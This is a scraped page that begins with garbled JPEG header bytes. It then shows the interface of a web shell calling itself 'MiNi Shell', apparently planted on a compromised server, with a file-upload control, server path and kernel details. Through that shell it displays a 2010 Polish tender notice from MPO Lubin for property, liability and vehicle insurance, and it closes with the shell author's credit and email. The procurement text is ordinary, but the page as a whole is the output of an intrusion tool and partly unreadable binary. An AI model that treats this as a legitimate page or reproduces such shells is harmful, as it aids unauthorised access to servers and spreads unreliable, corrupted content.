JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/338445-N-2010.html

<p class="kh_header"><b>Lubin: Świadczenie usług dla MPO Sp. z o.o. w zakresie ubezpieczeń z podziałem na zadania: zadanie nr 1 - Ubezpieczenie mienia i odpowiedzialności cywilnej
zadanie nr 2 - Ubezpieczenie komunikacyjne pojazdów MPO Sp. z o.o.- OC,NNW,AC</b><br>
<b>Numer ogłoszenia: 338445 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością , ul. Rynek 28, 59-300 Lubin, woj. dolnośląskie, tel. (76) 7249940, faks (76) 7249950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług dla MPO Sp. z o.o. w zakresie ubezpieczeń z podziałem na zadania: zadanie nr 1 - Ubezpieczenie mienia i odpowiedzialności cywilnej
zadanie nr 2 - Ubezpieczenie komunikacyjne pojazdów MPO Sp. z o.o.- OC,NNW,AC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług dla MPO Sp. z o.o. w zakresie ubezpieczeń z podziałem na zadania:   Zadanie nr 1 - Ubezpieczenie mienia i  odpowiedzialności cywilnej, Zadanie nr 2 - Ubezpieczenie komunikacje  pojazdów MPO Sp. z o.o.- OC, NNW,AC

CPV - 66510000-8 - usługi ubezpieczenia

A.	ZADANIE nr 1 - Ubezpieczenie mienia i odpowiedzialności cywilnej (CPV - 66515100-4, CPV - 66516000-0):

1)	ubezpieczenie mienia Spółki: 
1.1.	ubezpieczenie mienia od ognia i innych zdarzeń losowych:
a)	budynki i budowle 
b)	maszyny, urządzenia, wyposażenie, niskocenne składniki majątku
c)	gotówka w lokalu
1.2. ubezpieczenie maszyn od uszkodzeń, 
1.3. ubezpieczenie sprzętu elektronicznego od wszelkich ryzyk,
1.4. ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz wandalizmu. 
       oraz stłuczenia szyb 
2)	ubezpieczenie odpowiedzialności cywilnej 
zgodnie z opisem i zakresem,przedmiotem ubezpieczenia zawartym w rozdz. IV SIWZ
B.	ZADANIE nr 2 - Ubezpieczenie komunikacje  pojazdów MPO SP z o.o.- OC,NNW,AC :

ubezpieczenie komunikacyjne pojazdów MPO Sp. z o.o: . 
a)	obowiązkowe ubezpieczenie posiadaczy pojazdów mechanicznych -OC   
(CPV 66516100-1)
b)	ubezpieczenie kierowcy i pasażera,- NNW, - (CPV- 66512100-3)
c)	ubezpieczenie Auto Casco, - AC  - CPV(66514110-0)
zgodnie z opisem, zakresem, przedmiotem zawartym w rozdz. IV SIWZ wraz z załącznikami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się możliwość udzielania zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego dla zadania nr 1 i zadania nr 2, polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.51.00-4, 66.51.60.00-0, 66.51.61.00-1, 66.51.21.00-3, 66.51.41.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada aktualne zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej na terenie Polski w zakresie grup objętych przedmiotem zamówienia na które Wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę wg załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę wg załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę wg załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę wg załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony formularz oferty zgodne z załącznikiem  nr 1 do SIWZ wraz z formularzem cenowym dla zadania nr 1 - załącznik nr 1a SIWZ
lub/i
formularzem cenowym dla zadania nr 2 - załącznik nr 1b SIWZ - 
(w zależności na które i na ile zadań Wykonawca będzie składać ofertę) 
b)	Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku, jeżeli uprawnienie do podpisania oferty - reprezentowania podmiotu nie wynika z dokumentów załączonych do oferty, mianowicie:
-	Zamawiający, żąda, aby wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - (w przypadku spółki cywilnej winien złożyć każdy przedsiębiorca z osobna), aktualną umowę spółki cywilnej, aktualny statut spółki lub aktualny rejestr handlowy itp. Wymagane dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
-	Jeżeli uprawnienie do reprezentowania osoby podpisującej ofertę nie wynika z załączonych dokumentów do oferty należy dołączyć pełnomocnictwo w oryginale lub w postaci kopii poświadczonej za zgodność z oryginałem przez notariusza.
-	W oparciu o art. 26 ust. 3 i 4 ustawy pzp, w zakresie odnoszącym się do pełnomocnictw, będziemy występować do wykonawców będących osobami fizycznymi o uzupełnienie lub wyjaśnienie upoważnienia do podpisania oferty. Dla wykonawców będących osobami fizycznymi wskazane powyżej zaświadczenie będzie właśnie dokumentem potwierdzającym prawo do złożenia podpisu.
c)	Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.- tyko w przypadku złożenia oferty wspólnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dla zadania nr 1
Zamawiający  przewiduje możliwość zmian postanowień (aneksowania) niniejszej umowy 
w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków wprowadzenia takiej zmiany:
1)	w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego, nie przewidzianego wcześniej w Specyfikacji Istotnych Warunków Zamówienia 
2)	korzystne dla Zamawiającego  zmiany zakresu Ubezpieczenia wynikające z ze zmian OWU Wykonawcy za zgodą Zamawiającego i Wykonawcy
3)	Zamawiający przewiduje możliwość zmiany umowy w zakresie należnej składki ubezpieczeniowej w następujących przypadkach:
-	zmian w przedmiocie zamówienia (podwyższenia lub obniżenia sum ubezpieczenia) w związku z zakupem środków trwałych, sprzętu elektronicznego, maszyn, urządzeń, oraz ich modernizacją, likwidacją, sprzedażą lub zawarciem umów o użytkowanie, najem, lub leasing mienia będącego własnością osób trzecich.
-	odtworzenia sum ubezpieczenia przedmiotów nietrwałych i wartości pieniężnych w związku z wypłatą odszkodowania w tym mieniu (za zgodą Ubezpieczyciela) 
-	odtworzenia sumy gwarancyjnej ubezpieczenia odpowiedzialności cywilnej  w przypadku wypłaty odszkodowania z tego ubezpieczenia (za zgodą Ubezpieczyciela) 
-	rozszerzenia umowy ubezpieczenia odpowiedzialności cywilnej w przypadku konieczności objęcia ochroną ubezpieczeniową nowych ryzyk dodatkowych (za zgodą Ubezpieczyciela)
-	podwyższenia sumy gwarancyjnej ubezpieczenia odpowiedzialności cywilnej 
z przyczyn powstałych niezależnie od Zamawiającego. 
4)	Zamawiający zastrzega sobie prawo do podwyższenia sumy gwarancyjnej w okresie trwania umowy, w takim przypadku Ubezpieczyciel zobowiązuje się w ciągu 2 dni roboczych do wystawienia dokumentu (polisy) potwierdzającej niniejszą zmianę.
5)	Zamawiający przewiduje możliwość zmiany dotyczącej terminów płatności, wysokości i liczby rat składki w przypadku braku środków na zapłatę składek przez Zamawiającego w terminie przewidzianym w umowie oraz dokumentach ubezpieczenia, bez dodatkowej zwyżki wysokości składki przy rozłożeniu jej na raty.
dla zadania nr 2
Zamawiający  przewiduje możliwość zmian postanowień (aneksowania) niniejszej umowy 
w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków wprowadzenia takiej zmiany:
1)	korzystne dla Zamawiającego  zmiany zakresu Ubezpieczenia wynikające z ze zmian OWU Wykonawcy za zgodą Zamawiającego i Wykonawcy
2)	Zamawiający przewiduje możliwość zmiany umowy w zakresie należnej składki ubezpieczeniowej w następujących przypadkach:
-	nowo zakupionych pojazdów będą one automatycznie objęte ubezpieczeniem na warunkach określonych w umowie (z zastosowanie stawek ustalonych dla odpowiedniej kategorii pojazdu) - po uprzednim pisemnym zgłoszeniu ich do ubezpieczenia.
-	wycofania z ubezpieczenia  pojazdów w czasie trwania umowy składka będzie zwracana proporcjonalnie do niewykorzystanego okresu lub z zmian w zakresie ubezpieczenia pojazdów.
3)	Zamawiający przewiduje możliwość zmiany dotyczącej terminów płatności, wysokości i liczby rat składki w przypadku braku środków na zapłatę składek przez Zamawiającego w terminie przewidzianym w umowie oraz dokumentach ubezpieczenia, bez dodatkowej zwyżki wysokości składki przy rozłożeniu jej na raty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością 
ul. Rynek 28, 59-300 Lubin - pokój 10 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością 
ul. Rynek 28, 59-300 Lubin w pokoju nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 - Ubezpieczenie mienia i odpowiedzialności cywilnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	ubezpieczenie mienia Spółki: 
1.1.	ubezpieczenie mienia od ognia i innych zdarzeń losowych:
a)	budynki i budowle 
b)	maszyny, urządzenia, wyposażenie, niskocenne składniki majątku
c)	gotówka w lokalu
1.2. ubezpieczenie maszyn od uszkodzeń, 
1.3. ubezpieczenie sprzętu elektronicznego od wszelkich ryzyk,
1.4. ubezpieczenie mienia od kradzieży z włamaniem i rabunku oraz wandalizmu. 
       oraz stłuczenia szyb 
2)	ubezpieczenie odpowiedzialności cywilnej
szczegółowy opis przedmiotu zamówienia i zakresu stanowi rozdział IV SIWZ wraz z załącznikami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.51.00-4, 66.51.60.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Ubezpieczenie komunikacyjne pojazdów MPO Sp. z o.o.- OC, NNW, AC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ubezpieczenie komunikacyjne pojazdów MPO Sp. z o.o: . 
a)	obowiązkowe ubezpieczenie posiadaczy pojazdów mechanicznych -OC   

b)	ubezpieczenie kierowcy i pasażera,- NNW, (następstw nieszczęśliwych wypadków)
c)	ubezpieczenie Auto Casco, - AC  - 
szczegółowy opis przedmiotu i zakresu zamówienia stanowi rozdział IV siwz wraz z załącznikami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.61.00-1, 66.51.21.00-3, 66.51.41.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com